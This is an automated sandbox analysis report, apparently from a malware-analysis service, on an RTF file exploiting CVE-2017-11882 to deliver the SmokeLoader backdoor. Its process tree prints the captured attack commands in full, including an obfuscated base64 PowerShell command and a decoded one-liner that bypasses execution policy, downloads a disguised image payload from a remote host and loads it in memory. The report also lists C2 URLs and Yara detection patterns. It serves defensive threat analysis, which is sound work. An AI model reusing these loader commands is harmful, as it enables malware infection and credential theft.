
Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf

Overview

General Information

Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
Analysis ID:1502248
MD5:1131d758c8208af277e943f04339e646
SHA1:030adac1abc31aa8bc3a22dda63c4a005aee6e88
SHA256:eb8381b156aad734ef3a0328b4985ed1edeca1c8d79d66e094598f8c6992ac71
Tags:rtf

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected SmokeLoader
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Document exploit detected (process start blacklist hit)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Maps a DLL or memory area into another process
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3260 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3312 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3472 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? 
?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? 
?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? 
? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?ZQBk? ? ? ? ?EE? ? ? ? ?cwBz? ? ? ? ?GU? ? ? ? ?bQBi? ? ? ? ?Gw? ? ? ? ?eQ? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?GQ? ? ? ? ?bgBs? ? ? ? ?Gk? ? ? ? ?Yg? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?Tw? ? ? ? ?u? ? ? ? ?Eg? ? ? ? ?bwBt? ? ? ? ?GU? ? ? ? ?Jw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bt? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BN? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?VgBB? ? ? ? ?Ek? ? ? ? ?Jw? ? ? ? ?p? ? ? ? 
?C4? ? ? ? ?SQBu? ? ? ? ?HY? ? ? ? ?bwBr? ? ? ? ?GU? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?G4? ? ? ? ?dQBs? ? ? ? ?Gw? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?bwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?WwBd? ? ? ? ?F0? ? ? ? ?I? ? ? ? ?? ? ? ? ?o? ? ? ? ?Cc? ? ? ? ?d? ? ? ? ?B4? ? ? ? ?HQ? ? ? ? ?LgBW? ? ? ? ?EY? ? ? ? ?RQBX? ? ? ? ?C8? ? ? ? ?M? ? ? ? ?? ? ? ? ?5? ? ? ? ?C8? ? ? ? ?Ng? ? ? ? ?x? ? ? ? ?C4? ? ? ? ?O? ? ? ? ?? ? ? ? ?0? ? ? ? ?DE? ? ? ? ?Lg? ? ? ? ?0? ? ? ? ?Dk? ? ? ? ?Lg? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
            • RegAsm.exe (PID: 3748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 4056 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 4080 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 2480 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 1872 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 2772 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 2840 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 2836 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • explorer.exe (PID: 2704 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)
                • explorer.exe (PID: 2460 cmdline: C:\Windows\explorer.exe MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
    • EQNEDT32.EXE (PID: 3876 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3988 cmdline: taskeng.exe {B5E7D6C9-0A45-4095-9C68-D1725C8390DE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • gwseuha (PID: 4020 cmdline: C:\Users\user\AppData\Roaming\gwseuha MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution:
  • SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Malware configuration: {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
Yara match (submitted file):
  • Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf, Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents., Author: ditekSHen, Strings:
    • 0x1479:$obj2: \objdata
    • 0x1461:$obj3: \objupdate
    • 0x143d:$obj4: \objemb
Yara matches (memory dumps):
  • Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
  • Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Author: unknown, Strings:
    • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
  • Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security
  • Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Author: unknown, Strings:
    • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
  • Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Author: Joe Security

Yara matches (unpacked PE files):
